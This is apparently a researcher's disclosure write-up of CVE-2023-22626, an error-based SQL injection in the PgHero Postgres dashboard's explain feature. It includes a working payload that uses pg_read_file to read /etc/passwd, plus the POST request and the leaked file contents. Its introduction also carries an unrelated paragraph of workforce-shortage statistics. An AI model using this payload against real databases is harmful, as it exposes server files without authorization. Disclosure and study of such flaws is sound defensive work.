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CVE-2023-22626 Error Based SQL Injection on PGHero

I was able to find two CVEs in a short period of time during a project I am working on last year. In this article, I will detail one of the vulnerabilities I discovered within PgHero.

In 2019, the CyberSeek initiative revealed that cybersecurity jobs remained vacant for an average of 79 days, highlighting the industry's struggle to find qualified talent. Fast forward to 2022, the (ISC)2 Cybersecurity Workforce Study indicated that despite a record high of 4.7 million professionals in the global cybersecurity workforce, there was a need for an additional 3.4 million to secure digital assets effectively. This represented a significant 26% increase from the previous year's numbers, and alarmingly, nearly 70% of security leaders reported facing additional risks due to this talent shortage.

The aforementioned statistics illuminate the severity of the cybersecurity talent shortage. It is not just a theoretical issue but a tangible challenge that businesses across industries grapple with. The implications of this shortfall are far-reaching, from overworked existing staff and vulnerable to cyber threats. Therefore, dissecting this problem, understanding its roots, and exploring practical strategies for navigating this complex landscape becomes crucial.

CVE-2023-22626: PgHero - Error Based SQL Injection

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N / 7.5 / High

1) Function

PGHero is an open-source performance dashboard for Postgres databases. It allows developers and database administrators to monitor the health and performance of their Postgres databases by providing a visual interface to view key metrics, such as database size, number of connections, query performance, and slow queries.

The ANALYZE function in PGHero is a tool for analyzing the distribution of data in a Postgres database. It allows developers and database administrators to understand how data is stored in tables and indexes, and identify potential performance issues related to data distribution.

The Visualize function on PGHero is a tool for visualizing the performance metrics and query execution plans of a Postgres database. It provides a graphical interface that allows developers and database administrators to view and understand the performance of their database easily.

2) What is “Error Based SQL Injection”?

Error-based SQL injection is a type of SQL injection attack that exploits vulnerabilities in web applications to extract information from a database by causing the application to generate error messages. This can result in the extraction of information from the database, and, in some cases, from files stored on the server-side, depending on the privileges of the database user who is targeted by the attack.

3) Vulnerability Explanation

The following screenshot shows that the user can input data as a parameter of function explain(), where the prefix value can either be 'ANALYZE ' or '(ANALYZE, COSTS, VERBOSE, BUFFERS, FORMAT JSON)' depending on the commit parameter. Additionally, the value of the query variable will also be part of the parameter in the explain() function.

The screenshot demonstrates that the query undergoes filtering before being executed, which is intended to prevent SQL injection attacks. However, error-based SQL injection attacks may still be possible.

The following screenshots show that If an error occurs, then the error will be exposed through a template explain.html.erb and the expression-printing tag of the error.

The following screenshots show that If an error occurs, then the error will be exposed through a template explain.html.erb and the expression-printing tag of the error.

4. Proof-of-Concept

The following request and response provide evidence that an attacker could potentially access files on a web server via Error-based SQL Injection if the database user who connects to the web server has 'root' permission. This presents a significant security vulnerability, as it could allow an unauthorized user to gain access to sensitive files on the server.

Affected Module:

●      Affected Parameter: query

●      Payload:

SELECT * FROM pg_catalog.pg_tables where tablename = '1' or 1=cast((SELECT concat('file_read: ',(select * from pg_read_file('/etc/passwd', 0, 1000)))) as int);


POST /explain HTTP/1.1


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<!DOCTYPE html>



    <title>PgHero / Explain</title>


...[ TRUNCATED ] ...

    <div class="alert alert-danger">PG::InvalidTextRepresentation: ERROR:  invalid input syntax for type integer: &quot;file_read: root:x:0:0:root:/root:/bin/bash














list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin


gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin












5) Patch

Starting from version 3.1.0, PGHero no longer supports the "Analyze" and "Visualize" functions.

It is recommended to update the application.

This vulnerability was disclosed to the MITRE Corporation here, and after validation, was assigned the ID CVE-2023-22626

Additional details for the disclosure along with notes from the software vendor can be found at the page below:


Sophia Ham

Sophia Ham is a Cybersecurity Consultant in Cyber Operations in Horangi Pte Ltd.

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